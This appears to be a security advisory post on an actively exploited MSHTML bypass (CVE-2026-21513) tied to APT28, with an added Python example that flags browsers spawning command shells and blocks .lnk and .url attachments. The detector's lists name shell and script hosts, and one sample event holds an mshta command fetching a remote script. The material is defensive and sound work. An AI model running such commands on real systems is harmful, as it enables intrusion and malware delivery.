Code Defence Cyber security

State-sponsored actors are using browser bypasses to drop silent implants. 🌐

CVE-2026-21513 · Severity 8.8 · Active Zero-Day Exploitation of MSHTML Framework.

Reports from the last 24 hours link the Russia-based APT28 group to the active exploitation of a high-severity bypass in the MSHTML (browser) framework. This flaw allows an attacker to bypass security prompts when executing files on Microsoft systems via malicious HTML or shortcut (.lnk) files.

Attackers are delivering these files via email and hijacked links to install specialized implants for data collection. This bypass is particularly dangerous because it neutralizes the built-in warnings that users rely on to distinguish safe content from malicious payloads.

The uncomfortable truth: Your users are being targeted with links that download and execute malware the moment they are viewed, even if they never click Accept.

→ Apply the latest security updates to all Windows endpoints to patch the MSHTML framework.

→ Block the download or execution of untrusted .LNK and .URL files at the email gateway.

→ Monitor endpoint telemetry for unauthorized shell executions originating from browser processes.
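The last two recommendations, as an added example that is not part of the original post and not Code Defence's own tooling: a small Python check that (a) flags process-creation events where a command shell or script host is spawned by a browser process, and (b) flags mail attachments carrying a .lnk or .url extension, including double-extension names such as invoice.pdf.lnk. The JSON events and attachment names below are constructed samples in a Sysmon-like field layout (ParentImage, Image, CommandLine), not real telemetry, and the browser and shell process lists are assumptions a team would tune to its own estate.

```python
"""Detection logic for two of the advisory's recommendations.

Added example with constructed sample data; not the original post's code.
"""
import json
import os
from typing import Iterable, List, Tuple

# Assumed lists: tune to the browsers and script hosts present in your estate.
BROWSER_PARENTS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
SHELL_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
    "cscript.exe", "mshta.exe", "rundll32.exe",
}
BLOCKED_ATTACHMENT_EXTS = {".lnk", ".url"}

# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    '{"EventTime": "2026-01-15T09:01:10Z", "ParentImage": "C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\msedge.exe", '
    '"Image": "C:\\\\Windows\\\\System32\\\\cmd.exe", "CommandLine": "cmd.exe /c start update.hta"}',
    '{"EventTime": "2026-01-15T09:02:44Z", "ParentImage": "C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe", '
    '"Image": "C:\\\\Windows\\\\System32\\\\mshta.exe", "CommandLine": "mshta.exe http://example.invalid/x"}',
    '{"EventTime": "2026-01-15T09:03:02Z", "ParentImage": "C:\\\\Windows\\\\explorer.exe", '
    '"Image": "C:\\\\Windows\\\\System32\\\\cmd.exe", "CommandLine": "cmd.exe"}',
    '{"EventTime": "2026-01-15T09:03:30Z", "ParentImage": "C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\msedge.exe", '
    '"Image": "C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\msedge.exe", "CommandLine": "msedge.exe --type=renderer"}',
]

# Constructed attachment names (not from a real mailbox).
SAMPLE_ATTACHMENTS = ["invoice.pdf", "invoice.pdf.lnk", "Portal.URL", "notes.txt"]


def _basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def suspicious_child_processes(events: Iterable[str]) -> List[Tuple[str, str, str, str]]:
    """Return (time, parent, child, command line) for shells spawned by browsers.

    Only browser -> shell/script-host pairs are reported; a browser spawning
    its own renderer, or explorer.exe spawning cmd.exe, is not in scope here.
    """
    hits = []
    for raw in events:
        ev = json.loads(raw)
        parent = _basename(ev.get("ParentImage", ""))
        child = _basename(ev.get("Image", ""))
        if parent in BROWSER_PARENTS and child in SHELL_CHILDREN:
            hits.append((ev.get("EventTime", ""), parent, child, ev.get("CommandLine", "")))
    return hits


def blocked_attachments(filenames: Iterable[str]) -> List[str]:
    """Return attachment names whose final extension is .lnk or .url.

    The check is case-insensitive and uses the last extension, so
    'invoice.pdf.lnk' is caught while 'invoice.pdf' is not.
    """
    flagged = []
    for name in filenames:
        ext = os.path.splitext(name.strip().lower())[1]
        if ext in BLOCKED_ATTACHMENT_EXTS:
            flagged.append(name)
    return flagged


if __name__ == "__main__":
    for hit in suspicious_child_processes(SAMPLE_EVENTS):
        print("ALERT browser->shell:", hit)
    for name in blocked_attachments(SAMPLE_ATTACHMENTS):
        print("BLOCK attachment:", name)
```

On the sample data the first two events are reported (msedge.exe spawning cmd.exe, iexplore.exe spawning mshta.exe) and the other two are not; the attachment check flags invoice.pdf.lnk and Portal.URL. In production the event source would be a Sysmon or EDR process-creation stream and the parent list would include whichever processes host MSHTML in your environment.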

Does your current endpoint protection detect malicious scripts that execute without a user prompt? 👇

#Cybersecurity #Infosec #ThreatIntelligence #PatchManagement #SecurityLeadership #CodeDefence
